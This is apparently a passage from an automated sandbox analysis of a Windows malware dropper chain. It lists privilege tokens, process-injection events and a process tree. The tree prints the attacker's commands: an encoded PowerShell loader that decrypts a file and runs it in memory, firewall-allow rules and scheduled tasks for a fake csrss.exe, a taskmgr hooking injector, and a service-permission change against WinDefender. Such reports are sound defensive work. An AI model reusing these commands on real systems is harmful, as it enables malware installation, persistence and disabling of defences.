description pid Process Token: SeDebugPrivilege 956 powershell.exe Token: SeDebugPrivilege 2096 installutil.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeDebugPrivilege 4648 powershell.exe Token: SeDebugPrivilege 3184 powershell.exe Token: SeDebugPrivilege 3800 powershell.exe Token: SeDebugPrivilege 5416 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Token: SeDebugPrivilege 916 KJrrevHavC5XbNvd93Zt87NV.exe Token: SeImpersonatePrivilege 916 KJrrevHavC5XbNvd93Zt87NV.exe Token: SeDebugPrivilege 940 QB6YJisOeMAwgSEX9tGB7uFD.exe Token: SeDebugPrivilege 3004 Zl7alJlvns99KqkrvTPtua9F.exe Token: SeImpersonatePrivilege 940 QB6YJisOeMAwgSEX9tGB7uFD.exe Token: SeImpersonatePrivilege 3004 Zl7alJlvns99KqkrvTPtua9F.exe Token: SeDebugPrivilege 4700 sd9DA3ZWGLEoKHgSiqfkjIaO.exe Token: SeImpersonatePrivilege 4700 sd9DA3ZWGLEoKHgSiqfkjIaO.exe Token: SeDebugPrivilege 5828 powershell.exe Token: SeDebugPrivilege 6120 powershell.exe Token: SeDebugPrivilege 5196 powershell.exe Token: SeDebugPrivilege 3404 powershell.exe Token: SeDebugPrivilege 5812 powershell.exe Token: SeDebugPrivilege 3184 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 6128 powershell.exe Token: SeDebugPrivilege 2192 powershell.exe Token: SeDebugPrivilege 1248 powershell.exe Token: SeDebugPrivilege 4632 powershell.exe Token: SeDebugPrivilege 5536 powershell.exe Token: SeDebugPrivilege 2436 powershell.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeIncreaseQuotaPrivilege 5208 WMIC.exe Token: SeSecurityPrivilege 5208 WMIC.exe Token: SeTakeOwnershipPrivilege 5208 WMIC.exe Token: SeLoadDriverPrivilege 5208 WMIC.exe Token: SeSystemProfilePrivilege 5208 WMIC.exe Token: SeSystemtimePrivilege 5208 WMIC.exe Token: SeProfSingleProcessPrivilege 5208 WMIC.exe Token: SeIncBasePriorityPrivilege 5208 WMIC.exe Token: SeCreatePagefilePrivilege 5208 WMIC.exe Token: SeBackupPrivilege 5208 WMIC.exe Token: SeRestorePrivilege 5208 WMIC.exe Token: SeShutdownPrivilege 5208 WMIC.exe Token: SeDebugPrivilege 5208 WMIC.exe Token: SeSystemEnvironmentPrivilege 5208 WMIC.exe Token: SeRemoteShutdownPrivilege 5208 WMIC.exe Token: SeUndockPrivilege 5208 WMIC.exe Token: SeManageVolumePrivilege 5208 WMIC.exe Token: 33 5208 WMIC.exe Token: 34 5208 WMIC.exe Token: 35 5208 WMIC.exe Token: 36 5208 WMIC.exe Token: SeIncreaseQuotaPrivilege 5208 WMIC.exe Token: SeSecurityPrivilege 5208 WMIC.exe Token: SeTakeOwnershipPrivilege 5208 WMIC.exe Token: SeLoadDriverPrivilege 5208 WMIC.exe Token: SeSystemProfilePrivilege 5208 WMIC.exe Token: SeSystemtimePrivilege 5208 WMIC.exe Token: SeProfSingleProcessPrivilege 5208 WMIC.exe Token: SeIncBasePriorityPrivilege 5208 WMIC.exe Token: SeCreatePagefilePrivilege 5208 WMIC.exe Token: SeBackupPrivilege 5208 WMIC.exe Token: SeRestorePrivilege 5208 WMIC.exe Token: SeShutdownPrivilege 5208 WMIC.exe Token: SeDebugPrivilege 5208 WMIC.exe Token: SeSystemEnvironmentPrivilege 5208 WMIC.exe -
Suspicious use of FindShellTrayWindow 14 IoCs
pid Process 4600 u2gc.1.exe 4600 u2gc.1.exe 4600 u2gc.1.exe 4600 u2gc.1.exe 4600 u2gc.1.exe 4600 u2gc.1.exe 4600 u2gc.1.exe 5668 u1wo.1.exe 5668 u1wo.1.exe 5668 u1wo.1.exe 5668 u1wo.1.exe 5668 u1wo.1.exe 5668 u1wo.1.exe 5668 u1wo.1.exe -
Suspicious use of SendNotifyMessage 14 IoCs
pid Process 4600 u2gc.1.exe 4600 u2gc.1.exe 4600 u2gc.1.exe 4600 u2gc.1.exe 4600 u2gc.1.exe 4600 u2gc.1.exe 4600 u2gc.1.exe 5668 u1wo.1.exe 5668 u1wo.1.exe 5668 u1wo.1.exe 5668 u1wo.1.exe 5668 u1wo.1.exe 5668 u1wo.1.exe 5668 u1wo.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3772 wrote to memory of 428 3772 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe 83 PID 3772 wrote to memory of 428 3772 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe 83 PID 3772 wrote to memory of 428 3772 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe 83 PID 428 wrote to memory of 4888 428 explorku.exe 84 PID 428 wrote to memory of 4888 428 explorku.exe 84 PID 428 wrote to memory of 4888 428 explorku.exe 84 PID 428 wrote to memory of 4888 428 explorku.exe 84 PID 428 wrote to memory of 4888 428 explorku.exe 84 PID 428 wrote to memory of 4888 428 explorku.exe 84 PID 428 wrote to memory of 4888 428 explorku.exe 84 PID 428 wrote to memory of 4888 428 explorku.exe 84 PID 428 wrote to memory of 4888 428 explorku.exe 84 PID 428 wrote to memory of 4888 428 explorku.exe 84 PID 428 wrote to memory of 4888 428 explorku.exe 84 PID 428 wrote to memory of 4888 428 explorku.exe 84 PID 428 wrote to memory of 696 428 explorku.exe 85 PID 428 wrote to memory of 696 428 explorku.exe 85 PID 428 wrote to memory of 696 428 explorku.exe 85 PID 696 wrote to memory of 3856 696 amers.exe 86 PID 696 wrote to memory of 3856 696 amers.exe 86 PID 696 wrote to memory of 3856 696 amers.exe 86 PID 428 wrote to memory of 3668 428 explorku.exe 87 PID 428 wrote to memory of 3668 428 explorku.exe 87 PID 428 wrote to memory of 3668 428 explorku.exe 87 PID 3856 wrote to memory of 4644 3856 axplons.exe 88 PID 3856 wrote to memory of 4644 3856 axplons.exe 88 PID 4644 wrote to memory of 1332 4644 file300un.exe 90 PID 4644 wrote to memory of 1332 4644 file300un.exe 90 PID 1332 wrote to memory of 956 1332 cmd.exe 91 PID 1332 wrote to memory of 956 1332 cmd.exe 91 PID 3856 wrote to memory of 1336 3856 axplons.exe 93 PID 3856 wrote to memory of 1336 3856 axplons.exe 93 PID 3856 wrote to memory of 1336 3856 axplons.exe 93 PID 1336 wrote to memory of 1792 1336 NewB.exe 94 PID 1336 wrote to memory of 1792 1336 NewB.exe 94 PID 1336 wrote to memory of 1792 1336 NewB.exe 94 PID 1336 wrote to memory of 3180 1336 NewB.exe 96 PID 1336 wrote to memory of 3180 1336 NewB.exe 96 PID 1336 wrote to memory of 3180 1336 NewB.exe 96 PID 3180 wrote to memory of 2808 3180 ISetup8.exe 100 PID 3180 wrote to memory of 2808 3180 ISetup8.exe 100 PID 3180 wrote to memory of 2808 3180 ISetup8.exe 100 PID 3180 wrote to memory of 4600 3180 ISetup8.exe 103 PID 3180 wrote to memory of 4600 3180 ISetup8.exe 103 PID 3180 wrote to memory of 4600 3180 ISetup8.exe 103 PID 956 wrote to memory of 5008 956 powershell.exe 108 PID 956 wrote to memory of 5008 956 powershell.exe 108 PID 956 wrote to memory of 5008 956 powershell.exe 108 PID 956 wrote to memory of 2096 956 powershell.exe 109 PID 956 wrote to memory of 2096 956 powershell.exe 109 PID 956 wrote to memory of 2096 956 powershell.exe 109 PID 956 wrote to memory of 2096 956 powershell.exe 109 PID 956 wrote to memory of 2096 956 powershell.exe 109 PID 956 wrote to memory of 2096 956 powershell.exe 109 PID 956 wrote to memory of 2096 956 powershell.exe 109 PID 956 wrote to memory of 2096 956 powershell.exe 109 PID 956 wrote to memory of 2816 956 powershell.exe 110 PID 956 wrote to memory of 2816 956 powershell.exe 110 PID 956 wrote to memory of 2816 956 powershell.exe 110 PID 2096 wrote to memory of 2472 2096 installutil.exe 113 PID 2096 wrote to memory of 2472 2096 installutil.exe 113 PID 2096 wrote to memory of 2472 2096 installutil.exe 113 PID 2096 wrote to memory of 916 2096 installutil.exe 114 PID 2096 wrote to memory of 916 2096 installutil.exe 114
Processes
-
C:\Users\Admin\AppData\Local\Temp\2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe"C:\Users\Admin\AppData\Local\Temp\2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4888
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAG4AYgA3AHMAdwA2AHQAYwAzAC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQwAsADAAeAA0ADAALAAwAHgARABEACwAMAB4ADUAMQAsADAAeAAxAEMAKQAKACQA4H/5eiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADAARQAsADAAeAA3ADkALAAwAHgAMQA1ACwAMAB4AEEAMQAsADAAeABEADkALAAwAHgAOQBBACwAMAB4ADMARgAsADAAeABGAEEALAAwAHgAMwA1ACwAMAB4ADEAQgAsADAAeAA5ADEALAAwAHgARgAzACwAMAB4ADQAMQAsADAAeABFADQALAAwAHgAMAA0ACwAMAB4ADMARQApAAoACgAkAD2E9lMgAD0AIAAdZ7GCFVn+YiAALQCFaLGCIAAkAIVosYIgAC0A4H/5eiAAJADgf/l6IAAtAD2E9lMgACQAsoOxggoACgAkALKEbFHxgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQAPYT2UykAKQA7AAoAJADLeUNTIAA9ACAAJACyhGxR8YIuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAy3lDUy4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgAKAA=="6⤵
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAG4AYgA3AHMAdwA2AHQAYwAzAC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQwAsADAAeAA0ADAALAAwAHgARABEACwAMAB4ADUAMQAsADAAeAAxAEMAKQAKACQA4H/5eiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADAARQAsADAAeAA3ADkALAAwAHgAMQA1ACwAMAB4AEEAMQAsADAAeABEADkALAAwAHgAOQBBACwAMAB4ADMARgAsADAAeABGAEEALAAwAHgAMwA1ACwAMAB4ADEAQgAsADAAeAA5ADEALAAwAHgARgAzACwAMAB4ADQAMQAsADAAeABFADQALAAwAHgAMAA0ACwAMAB4ADMARQApAAoACgAkAD2E9lMgAD0AIAAdZ7GCFVn+YiAALQCFaLGCIAAkAIVosYIgAC0A4H/5eiAAJADgf/l6IAAtAD2E9lMgACQAsoOxggoACgAkALKEbFHxgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQAPYT2UykAKQA7AAoAJADLeUNTIAA9ACAAJACyhGxR8YIuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAy3lDUy4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgAKAA==7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"8⤵PID:5008
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"8⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Users\Admin\Pictures\Hvoiy4AeWVSFQ1Iu3PervIKv.exe"C:\Users\Admin\Pictures\Hvoiy4AeWVSFQ1Iu3PervIKv.exe"9⤵
- Executes dropped EXE
PID:2472 -
C:\Users\Admin\AppData\Local\Temp\u1wo.0.exe"C:\Users\Admin\AppData\Local\Temp\u1wo.0.exe"10⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:3628
-
-
C:\Users\Admin\AppData\Local\Temp\u1wo.1.exe"C:\Users\Admin\AppData\Local\Temp\u1wo.1.exe"10⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5668
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 154810⤵
- Program crash
PID:5744
-
-
-
C:\Users\Admin\Pictures\KJrrevHavC5XbNvd93Zt87NV.exe"C:\Users\Admin\Pictures\KJrrevHavC5XbNvd93Zt87NV.exe"9⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:916 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4648
-
-
C:\Users\Admin\Pictures\KJrrevHavC5XbNvd93Zt87NV.exe"C:\Users\Admin\Pictures\KJrrevHavC5XbNvd93Zt87NV.exe"10⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:5480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile11⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"11⤵PID:5436
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes12⤵
- Modifies Windows Firewall
PID:4648
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile11⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6128
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile11⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe11⤵PID:2112
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile12⤵
- Command and Scripting Interpreter: PowerShell
PID:1248
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F12⤵
- Creates scheduled task(s)
PID:3728
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f12⤵PID:5552
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:5088
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile12⤵
- Command and Scripting Interpreter: PowerShell
PID:3912
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile12⤵
- Command and Scripting Interpreter: PowerShell
PID:1972
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll12⤵PID:5896
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F12⤵
- Creates scheduled task(s)
PID:4744
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"12⤵PID:3720
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)13⤵PID:4236
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)14⤵
- Launches sc.exe
PID:5504
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Zl7alJlvns99KqkrvTPtua9F.exe"C:\Users\Admin\Pictures\Zl7alJlvns99KqkrvTPtua9F.exe"9⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
C:\Users\Admin\Pictures\Zl7alJlvns99KqkrvTPtua9F.exe"C:\Users\Admin\Pictures\Zl7alJlvns99KqkrvTPtua9F.exe"10⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:2268 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile11⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5196
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"11⤵PID:3744
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes12⤵
- Modifies Windows Firewall
PID:5712
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile11⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile11⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
-
-
C:\Users\Admin\Pictures\sd9DA3ZWGLEoKHgSiqfkjIaO.exe"C:\Users\Admin\Pictures\sd9DA3ZWGLEoKHgSiqfkjIaO.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3184
-
-
C:\Users\Admin\Pictures\sd9DA3ZWGLEoKHgSiqfkjIaO.exe"C:\Users\Admin\Pictures\sd9DA3ZWGLEoKHgSiqfkjIaO.exe"10⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- Modifies data under HKEY_USERS
PID:2392 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile11⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5828
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"11⤵PID:1708
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes12⤵
- Modifies Windows Firewall
PID:6072
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile11⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
